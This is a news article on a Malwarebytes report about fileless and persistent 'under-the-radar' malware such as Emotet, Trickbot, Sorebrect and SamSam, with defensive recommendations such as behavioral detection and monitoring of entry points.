- Fileless attacks accounted for 35 percent of all malware attacks in 2018 and are 10 times more likely to succeed than file-based attacks.
- Emotet, Trickbot, Sorebrect and SamSam attacks are expected to dominate the future threat landscape.
The threat actors who create malware variants are constantly improving their methods and innovating to subvert the cyber defense capabilities of their targets. Therefore, it becomes essential for the cybersecurity community to continually monitor the activities of new malware strains and find ways to mitigate their impact.
The security researchers at Malwarebytes, who study the various malware attack methods, have published a research report titled “Under the Radar - The Future of Undetected Malware”. The use of newer infection methods by malware authors in recent times has given rise to a new class of attacks, which could very well define the future of the threat landscape, according to the researchers.
Malware authors adopting new strategies
For malware developers, evading detection while infiltrating a targeted system has always been a key goal. However, in recent times, the strategy of malware authors has undergone a major change.
“Recently, there was a noticeable shift in malware development methodology. Avoiding detection was one thing, but threat actors soon came to another realization: the longer they held the infected endpoint, the more their profit increased. As long as they survived attempts at remediation, they could turn the money taps back on,” the researchers explained.
The recent wave of malware attacks is designed to leave behind a minor tentacle, which would help attackers regrow the malware later. “As a result, with this dual focus, a new class of malware has risen to prominence: under-the-radar malware,” the researchers said.
These new class of attacks adopts propagation and anti-forensic techniques used by earlier complex nation-state attacks to avoid detection and maintain persistence. Fileless attacks have become a prime choice for cybercriminals since most of the existing security products are designed such that they are unable to fend off attacks from file-based malware.
Fileless malware attacks comprise 35 percent of all the attacks in 2018. These attacks are almost 10 times more likely to succeed than file-based attacks, according to a recent Ponemon Institute report.
Among the current threats, Emotet and Trickbot occupy a prominent spot.
- Emotet, which is a banking trojan/downloader/botnet, has been detected over 1.5 million times between January and September 2018, according to Malwarebytes’ telemetry.
- The US-CERT released an alert about Emotet in July 2018 after witnessing a barrage of attack campaigns throughout the year.
- Trickbot, closely related to Emotet, has also been detected over half a million times, targeting the academic sector (from primary schools to universities), within the same period.
Other major threats include the Sorebrect ransomware, a completely fileless ransomware infection, and SamSam ransomware - a non-automated ransomware which is controlled by the attackers in an entirely manual process using batch scripts.
Where are the traditional security solutions lacking?
“There are three primary shortcomings with what we refer to as traditional security measures, including antivirus, that fail to utilize behavioral detection and a multi-layered approach to detecting and remediating threats,” researchers said.
- Traditional security solutions only look for file-based malware, which is of little to no use in case of fileless attacks.
- Some existing security measures rely solely on human-created signatures for their detection engine, which doesn’t work in identifying newer malware strains.
- The third major shortcoming of traditional security solutions is the lack of an ability to monitor process memory, which is used by modern malware to hijack legitimate processes to hide their network activity or to hide its existence entirely.
Current effective defense
The researchers provide with some key pointers for improving the security solutions in use for mitigating against the future generation of malware.
- Instead of relying solely on signature-based detection, using behavioral detection which is dynamic and can learn from the threats it encounters is a more effective approach for future threats.
- Most malware is spread through exploit kits and through malicious spam campaigns and often through avenues that can be monitored and protected. According to the report, “When you combine behavioral detection technology with monitoring entry points, you create a very powerful ‘bouncer’ for your systems that will keep your endpoints out of the ‘potential victim’ category.”
- The modern security solutions also need to develop a self-defense mode to prevent it from getting disabled or removed from the system during an attack.
To protect against the evolving threat landscape, its very important for the cyber defense solutions to understand these new strategies and adapt to modern tools in order to be ready for the new class of attacks.